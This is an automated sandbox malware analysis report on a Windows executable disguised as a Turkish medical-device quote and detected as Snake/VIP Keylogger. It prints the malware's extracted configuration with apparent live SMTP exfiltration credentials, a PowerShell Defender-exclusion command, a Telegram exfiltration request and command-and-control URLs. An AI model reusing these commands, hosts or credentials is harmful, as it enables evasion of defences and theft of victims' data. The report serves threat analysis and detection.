Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe

Overview

General Information

Sample name:fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
renamed because original name is a hash value
Original sample name:fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Siparii jpeg docx .exe
Analysis ID:1572259
MD5:a4ff2584dad5f40a71bdd4a108528492
SHA1:ad9413cebc5c0fc3ab344c00cb361fef9b0a0efe
SHA256:bcdee41502d32ac1f8b9ef98a25047a18550caf4947cb8111c2276cabb106149
Tags:exeuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe (PID: 7588 cmdline: "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe" MD5: A4FF2584DAD5F40A71BDD4A108528492)
    • powershell.exe (PID: 7828 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "bilgi@adendanismanlik.com.tr", "Password": "Omer1402&", "Host": "mail.adendanismanlik.com.tr", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "bilgi@adendanismanlik.com.tr", "Password": "Omer1402&", "Host": "mail.adendanismanlik.com.tr", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d0d5:$a1: get_encryptedPassword
        • 0x2d3ea:$a2: get_encryptedUsername
        • 0x2cee5:$a3: get_timePasswordChanged
        • 0x2cfee:$a4: get_passwordField
        • 0x2d0eb:$a5: set_encryptedPassword
        • 0x2e7b5:$a7: get_logins
        • 0x2e718:$a10: KeyLoggerEventArgs
        • 0x2e37d:$a11: KeyLoggerEventArgsEventHandler
        00000006.00000002.3782735191.0000000002F8F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          Click to see the 13 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          6.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            6.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              6.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                6.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 26 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, ParentProcessId: 7588, ParentProcessName: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe", ProcessId: 7828, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, ParentProcessId: 7588, ParentProcessName: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe", ProcessId: 7828, ProcessName: powershell.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 77.245.159.14, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, Initiated: true, ProcessId: 7844, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49830
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, ParentProcessId: 7588, ParentProcessName: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe", ProcessId: 7828, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-10T10:32:26.508181+010028033053Unknown Traffic192.168.2.749729172.67.177.134443TCP
                    2024-12-10T10:32:31.404226+010028033053Unknown Traffic192.168.2.749743172.67.177.134443TCP
                    2024-12-10T10:32:45.131575+010028033053Unknown Traffic192.168.2.749780172.67.177.134443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-10T10:32:20.643001+010028032742Potentially Bad Traffic192.168.2.749704132.226.247.7380TCP
                    2024-12-10T10:32:24.846162+010028032742Potentially Bad Traffic192.168.2.749704132.226.247.7380TCP
                    2024-12-10T10:32:29.783667+010028032742Potentially Bad Traffic192.168.2.749734132.226.247.7380TCP
                    2024-12-10T10:32:33.877449+010028032742Potentially Bad Traffic192.168.2.749750132.226.247.7380TCP
                    2024-12-10T10:32:39.361877+010028032742Potentially Bad Traffic192.168.2.749764132.226.247.7380TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "bilgi@adendanismanlik.com.tr", "Password": "Omer1402&", "Host": "mail.adendanismanlik.com.tr", "Port": "587", "Version": "4.4"}
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "bilgi@adendanismanlik.com.tr", "Password": "Omer1402&", "Host": "mail.adendanismanlik.com.tr", "Port": "587", "Version": "4.4"}
                    Multi AV Scanner detection for submitted file
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeReversingLabs: Detection: 23%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49717 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49809 version: TLS 1.2
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: kDme.pdbSHA256 source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                    Source: Binary string: kDme.pdb source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 079A7AACh1_2_079A7C8B
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0124F305h6_2_0124F177
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0124F305h6_2_0124F354
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0124FAC1h6_2_0124F809

                    Networking

                    barindex
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 6.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.7:49830 -> 77.245.159.14:587
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/12/2024%20/%2010:44:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 172.67.177.134 172.67.177.134
                    Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                    Source: Joe Sandbox ViewASN Name: NIOBEBILISIMHIZMETLERITR NIOBEBILISIMHIZMETLERITR
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49734 -> 132.226.247.73:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49750 -> 132.226.247.73:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49704 -> 132.226.247.73:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49764 -> 132.226.247.73:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49743 -> 172.67.177.134:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49780 -> 172.67.177.134:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49729 -> 172.67.177.134:443
                    Source: global trafficTCP traffic: 192.168.2.7:49830 -> 77.245.159.14:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49717 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/12/2024%20/%2010:44:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficDNS traffic detected: DNS query: mail.adendanismanlik.com.tr
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 10 Dec 2024 09:32:55 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002F8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1340718168.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
